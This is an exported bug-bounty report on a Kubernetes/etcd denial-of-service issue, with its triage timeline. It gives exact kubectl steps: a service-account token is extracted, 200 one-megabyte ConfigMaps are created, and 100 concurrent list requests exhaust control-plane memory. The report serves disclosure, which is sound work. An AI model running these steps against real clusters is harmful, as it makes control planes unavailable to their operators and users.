Notes:
- The report was not accepted. I intend to file a public issue, but haven't yet.
- Kubernetes asks for reports to be submitted through https://hackerone.com. That's where I submitted the report. This is an export of the report.
Title: Concurrent list requests of many, large Kubernetes resources cause etcd members to exhaust almost all available memory
Scope: https://github.com/kubernetes/kubernetes
Weakness: Denial of Service
Severity: Medium (6.5)
Link: /reports/1058775
Date: 2020-12-14 21:20:50 +0000
By: @dlipovetsky
CVE IDs:
Details:
In a Kubernetes cluster deployed with the default configuration, a user who can create and list large (e.g. 1MB) resources (e.g. ConfigMaps) can cause one or more etcd members to exhaust almost all available memory of the host, causing one or more control plane replicas to become unavailable. In my experiments, the kernel OOM-killed multiple processes, including etcd, but the affected control plane replicas still had to be restarted before they became available again.
Moreover, any client (e.g. a controller) that watches said resources may exhaust its available memory (e.g. as restricted by a quota) when synchronizing its cache.
As the available memory of each control plane replica increases, so do the number of resources that must be created and the number of concurrent list queries required to reproduce this vulnerability. For 3 control plane replicas, each with 16GB system memory, 200 1MB ConfigMaps and 100 concurrent list requests should be sufficient. I have not yet looked for an upper bound on either the number of resources or the number of concurrent list requests.
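As a rough illustration of why these numbers are plausible, the following sketch multiplies them out. It assumes (this is an assumption, not a measurement from the report) that every in-flight list response holds its own full copy of every payload, and it ignores encoding and bookkeeping overhead. The payload size is the one used in the reproduction steps.

```shell
# Back-of-the-envelope estimate only. Assumption: each in-flight list
# response holds its own full copy of every ConfigMap payload.
payload_bytes=1024768    # payload size used in the reproduction steps
configmaps=200           # number of ConfigMaps created
concurrent_lists=100     # number of concurrent list requests

per_list_bytes=$((payload_bytes * configmaps))
total_bytes=$((per_list_bytes * concurrent_lists))

echo "per list response:    $((per_list_bytes / 1048576)) MiB"
echo "all concurrent lists: $((total_bytes / 1048576)) MiB"
```

Under that assumption, a single list response is about 195 MiB and 100 of them in flight come to about 19 GiB, which is more than the 16GB of system memory on each replica.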
In v1.20, API Priority and Fairness is enabled by default. It has had no effect on my experiments; although some of the concurrent list requests are throttled, etcd still exhausts available memory. To be fair, I have not changed the default configuration.
I have also replicated these experiments with Secrets (which, unlike ConfigMaps, can be larger than 1MB). Other resources may also work.
Kubernetes: v1.20.0, v1.19.x, v1.18.x
etcd: v3.4.13, v3.4.3
- Deploy a Kubernetes cluster with the default configuration. I used kubeadm on an Ubuntu 20.04 VM.
- Create role and rolebinding for system:serviceaccount:default:default
USER="system:serviceaccount:default:default"
kubectl create role configmap-readwriter --verb=create,list --resource=configmap
kubectl create rolebinding default-configmap-readwriter --user "$USER" --role configmap-readwriter
- Create kubeconfig context for "system:serviceaccount:default:default" and cluster "kubernetes"
Note: You may need to change the CLUSTERNAME value.
CLUSTERNAME=kubernetes
TOKENNAME="$(kubectl get serviceaccount/default -o jsonpath='{.secrets[0].name}')"
TOKEN="$(kubectl get secret $TOKENNAME -o=jsonpath='{.data.token}' | base64 --decode)"
kubectl config set-credentials default-sa --token="$TOKEN"
kubectl config set-context default-sa --user=default-sa --cluster="$CLUSTERNAME"
- (Optional) Verify the limited privileges
kubectl config use-context default-sa
kubectl auth can-i --list
- (Optional) Observe the available memory on one or more control plane replicas. For example, use watch "free -h".
- Using the context from Step 2, create 200 ConfigMaps, 1MB each, in the default namespace
kubectl config use-context default-sa
cat > cm.yaml<<EOF
apiVersion: v1
kind: ConfigMap
metadata:
  generateName: payload-
data:
  payload: $(base64 --wrap=0 /dev/urandom | head -c 1024768)
EOF
for i in {1..200}; do kubectl create -f cm.yaml; done
- Using the context from Step 2, list all ConfigMaps in the default namespace, 100 times, concurrently
kubectl config use-context default-sa
for i in {1..100}; do kubectl get configmaps & done
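The one-line loop above starts the requests in the background but neither waits for them nor reports how many failed (for example, because they were throttled). A minimal sketch of a helper that does both follows; run_concurrently is a hypothetical name, not part of kubectl, and the sketch only defines the function without contacting a cluster.

```shell
# Hypothetical helper: run a command N times concurrently, wait for all
# copies to finish, and print how many exited with a non-zero status.
run_concurrently() {
  rc_n="$1"; shift
  rc_pids=""
  rc_failed=0
  rc_i=0
  while [ "$rc_i" -lt "$rc_n" ]; do
    "$@" >/dev/null 2>&1 &          # start one copy in the background
    rc_pids="$rc_pids $!"           # remember its PID
    rc_i=$((rc_i + 1))
  done
  for rc_pid in $rc_pids; do
    wait "$rc_pid" || rc_failed=$((rc_failed + 1))
  done
  echo "$rc_failed"
}

# Example use against a cluster (not executed here):
#   run_concurrently 100 kubectl get configmaps
```

Counting failures this way only distinguishes successful from unsuccessful requests; it says nothing about memory use, which still has to be observed on the control plane replicas.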
Exhausting available memory while responding to list queries seems to be a known issue for etcd: etcd-io/etcd#12457 (comment). There is a proposal to add a QoS mechanism to protect etcd from its clients.
An attack could make the cluster control plane unavailable. It could also cause other API clients (e.g. controllers) to exhaust their available memory.
Timeline:
2020-12-14 21:23:37 +0000: @dlipovetsky (comment) This is my first time estimating CVE severity. My coworkers reviewed my report, and had no objections, but I take responsibility, and apologize, if the severity is incorrect.
2020-12-15 11:35:06 +0000: @turtle_shell (bug triaged) Hello @dlipovetsky,
Thank you for your submission! We were able to validate your report, and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change.
Regards, @turtle_shell
2020-12-15 11:41:34 +0000: @turtle_shell (report severity updated)
2020-12-15 16:58:24 +0000: @dlipovetsky (comment) Thanks for triaging this, and the update, @turtle_shell.
I realize that this issue might be seen as a failure of "tuning the control plane for the appropriate scale," but I suspect that the attack works at any scale, though I admit I have not tested this exhaustively.
2020-12-16 17:30:31 +0000: @dlipovetsky (comment) "There is a proposal to add a QoS mechanism to protect etcd from its clients."
I misunderstood this proposal. It's more about fairness, and I don't think it will address the issue I'm reporting.
2020-12-18 22:40:25 +0000: @tallclair (bug informative) I've reviewed this issue with several of the kubernetes API machinery leads, and we've concluded that this is largely working as intended. Existing mitigations include:
- we don't allow anonymous users to do this
- resourcequota can be used to limit how many configmaps can exist in a namespace
- the audit logs let you find which user is abusing you
- naughty, non-anonymous users can be handled out of band
- naughty, non-anonymous users that aren't constrained by quota can do all sorts of bad things to your cluster
Furthermore, there are known scalability issues with list requests, but those are being handled as scalability and performance bugs, not as security issues.
If you are not satisfied with these mitigations, I encourage you to file a public issue or raise the concerns with SIG API Machinery.
2020-12-18 22:40:51 +0000: @tallclair (agreed on going public)
2020-12-19 00:08:46 +0000: @dlipovetsky (comment) Thanks for reviewing, and the feedback, @tallclair.
I'll take some time to see whether I can reproduce this taking namespace resource quotas into account.
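A namespace quota of the kind mentioned in the review might look like the following sketch. The quota name (configmap-count), the file name (quota.yaml), and the limit of 20 are illustrative assumptions, not values from the report or the review.

```shell
# Write a ResourceQuota manifest that caps the number of ConfigMaps in the
# default namespace. Name and limit are illustrative assumptions.
cat > quota.yaml <<'EOF'
apiVersion: v1
kind: ResourceQuota
metadata:
  name: configmap-count
  namespace: default
spec:
  hard:
    configmaps: "20"
EOF

# Apply it with cluster-admin credentials (not executed here):
#   kubectl apply -f quota.yaml
```

A quota like this caps how many ConfigMaps can exist in the namespace, and so bounds the size of a single list response. It does not limit the number of concurrent list requests.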